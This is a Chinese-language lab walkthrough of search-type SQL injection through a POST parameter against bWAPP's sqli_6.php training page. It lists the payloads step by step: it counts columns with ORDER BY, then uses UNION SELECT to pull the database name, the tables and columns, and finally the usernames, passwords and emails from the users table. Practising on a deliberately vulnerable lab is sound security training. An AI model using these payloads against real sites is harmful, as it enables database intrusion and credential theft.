1、POST型注入就要先找到POST参数,在搜索框输入“1”后提交,按F12查看审查元素,找到“网络”,再点击POST项,接着点击右边的“参数”,查看POST的参数为“title”,如下图:
SQL注入之bWAPP之sqli_6.php
2、开始构造,在hackbar的POST栏里输入“title=1'”,提交,返回的报错含有“%”,所以可以确定是搜索型注入。结果如下图:
SQL注入之bWAPP之sqli_6.php
输入“title=1%'and'%'='”,没有报错,说明是搜索型注入,结果如下图:
SQL注入之bWAPP之sqli_6.php
3、判断字段数:
输入“title=1%'order by 7 #+”正常;输入“title=1%'order by 8 #+”报错,说明字段数为7,这里注释用“#”正常,用“--”会报错,我不知道为什么,结果如下图:
SQL注入之bWAPP之sqli_6.php
SQL注入之bWAPP之sqli_6.php
查看显示位置,输入“title=1%'union select 1,2,3,4,5,6,7 #+”,结果如图:
SQL注入之bWAPP之sqli_6.php
4、查询数据库等信息:
输入“title=1%'union select 1,database(),version(),4,user(),6,7 #+”,查询数据库名、数据库版本、当前用户,结果如图:
SQL注入之bWAPP之sqli_6.php
5、查询表名:
输入“title=1%'union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp' #+”,较重要的是users表,结果如图:
SQL注入之bWAPP之sqli_6.php
6、查询字段名:
输入“title=1%'union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='users' #+”,较重要的字段名有admin、password、email,结果如图:
SQL注入之bWAPP之sqli_6.php
7、查询字段内容:
输入“title=1%'union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users #+”,结果如图:
SQL注入之bWAPP之sqli_6.php

同样,有兴趣可以试试其他表和字段。